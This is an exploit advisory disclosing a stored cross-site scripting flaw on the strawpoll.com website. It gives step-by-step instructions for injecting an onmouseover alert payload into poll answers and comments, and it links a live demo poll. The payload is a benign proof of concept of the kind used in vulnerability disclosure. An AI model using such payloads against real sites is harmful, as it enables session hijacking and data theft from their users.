############################0xSilver############################ # Exploit Author: @Meshari-Almalki # Exploit Title: Strawpoll - Cross Site Scripting (Stored) # Vendor: strawpoll.com # Date: 2020-10-18 # Software Version: * # Software Link: N/A # Google Dork: N/A ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Vuln poc ==================== [1] - Go to strawpoll.com [2] - Sign in and Create new poll [3] -Fill Answer Options with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [4] - Now you can see in top the payload will be execute when you mouse over it . ============================================================= [*] Another Exploit : [-] After create poll or visit any poll of another people [-] go to comment and send it with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [-] go to your comment after sent and click on delete , then mouse over it , will be execute ############################################################# [*] Demo: ========= https://strawpoll.com/sqvuggup3 <meta name="description" content="What's your opinion? Vote now: <a onmouseover="alert(document.domain)">0xSilver</a>, <a onmouseover="alert(document.domain)">0xSilver</a>" /> ############################################################# [*] Contact: ============ # Telegram: t.me/x0Saudi # Twitter: twitter.com/slv0d